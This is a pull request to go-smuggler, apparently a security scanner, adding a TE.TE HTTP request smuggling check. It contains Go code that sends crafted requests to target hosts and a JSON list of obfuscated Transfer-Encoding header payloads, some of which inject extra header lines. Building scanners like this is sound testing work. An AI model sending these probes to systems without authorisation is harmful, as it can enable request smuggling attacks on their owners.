### PR TITLE
Adding TE.TE testcase

### DIFF
--- a/cmd/go-smuggler/main.go
+++ b/cmd/go-smuggler/main.go
@@ -80,9 +80,9 @@ func scan(urls []string, time_out time.Duration, wg *sync.WaitGroup)	{
 				port = "443"
 			}	
 
-			//Add new testcases above
 			test_cases.Clte(hostname, port, path, time_out)
 			test_cases.Tecl(hostname, port, path, time_out)
+			test_cases.Tete(hostname, port, path, time_out)
 		}
 	}
 	

--- a/internal/structures/tete.go
+++ b/internal/structures/tete.go
@@ -1,0 +1,12 @@
+
+package structures
+
+type Tete struct	{
+	Cases []struct	{
+		ContentType string `json:"content_type"`
+		Connnection string `json:"connection"`
+		TransferEncoding string `json:"transfer_encoding"`
+		ContentLength string `json:"content_length"`
+		Body string `json:"body"`
+	} `json:"cases"`
+}

--- a/internal/test_cases/tete.go
+++ b/internal/test_cases/tete.go
@@ -1,0 +1,62 @@
+
+package test_cases
+
+import (
+	"time"
+	"io/ioutil"
+	"log"
+	"fmt"
+	"github.com/fatih/color"
+	"encoding/json"
+	"github.com/tomnomnom/rawhttp"
+	"github.com/poseidontor/go-smuggler/internal/structures"
+	"github.com/poseidontor/go-smuggler/internal/requests"
+)
+
+
+func Tete(hostname string, port string, path string, time_out time.Duration)	{
+	start := time.Now()
+	content, err_io := ioutil.ReadFile("./payloads/tete.json")
+	if err_io != nil	{
+		log.Fatal("Error opening file: ", err_io)
+	}
+
+	var payload structures.Tete
+	err_file := json.Unmarshal([]byte(content), &payload)
+	if err_file != nil {
+		log.Fatal("error unmarshaling json: ", err_file)
+	}
+
+	var timeout time.Duration = time_out
+	
+	var resp[2]*rawhttp.Response
+	
+	for _, value := range payload.Cases {
+		for i := 0; i < 2; i++	{
+			content_type := value.ContentType
+			connection := value.Connnection
+			transfer_encoding := value.TransferEncoding
+			body := value.Body
+			content_length := value.ContentLength
+
+			resp[i] = requests.Make_request_http1(hostname, port, path, content_type, connection, transfer_encoding, content_length, body, timeout);
+			time.Sleep(10 * time.Millisecond)
+		}
+		
+		if resp[0] != nil && resp[1] != nil{
+			if resp[0].StatusCode() == "504" || resp[1].StatusCode() == "504" {
+				fmt.Printf("[-] Received 504: Gateway Timeout for %s\n", hostname)
+			}
+
+			if resp[0].StatusCode() == "200" && resp[1].StatusCode() == "403" {
+				color.Red("[+] https://%s:%s%s could possibly be vulnerble to TE.TE based request smuggling.\n", hostname, port, path)
+				break
+			}
+			secs := time.Since(start).Seconds()
+
+			fmt.Printf("%.2f seconds taken for https://%s:%s%s\n", secs, hostname, port, path)
+		}
+		
+	}
+} 
+	

--- a/payloads/tete.json
+++ b/payloads/tete.json
@@ -1,0 +1,78 @@
+{
+    "cases":[
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "Transfer-Encoding: chunked\r\nTransfer-encoding: abc",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "Transfer-Encoding: chunked\r\nTransfer-Encoding: x",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "Transfer-encoding: chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "Transfer-Encoding :   chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "Transfer-Encoding : chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "transfer-Encoding: chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "transfer-encoding: chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": " Transfer-Encoding: chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        },
+         
+        {
+            "content_type":"Content-Type: application/x-www-form-urlencoded",
+            "connection": "Connection: keep-alive",
+            "transfer_encoding": "X:X\r\nTransfer-Encoding: chunked",
+            "content_length": "Content-Length: 3", 
+            "body": "1\r\nZ\r\n0\r\n\r\n"
+        }
+         
+    ]    
+}        


### PR DESCRIPTION
Added test cases for TE.TE http request smuggling.

Here, the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.

There are potentially endless ways to obfuscate the Transfer-Encoding header. For example:

```
Transfer-Encoding: xchunked

Transfer-Encoding : chunked

Transfer-Encoding: chunked
Transfer-Encoding: x

Transfer-Encoding:[tab]chunked

[space]Transfer-Encoding: chunked

X: X[\n]Transfer-Encoding: chunked

Transfer-Encoding
: chunked
``` 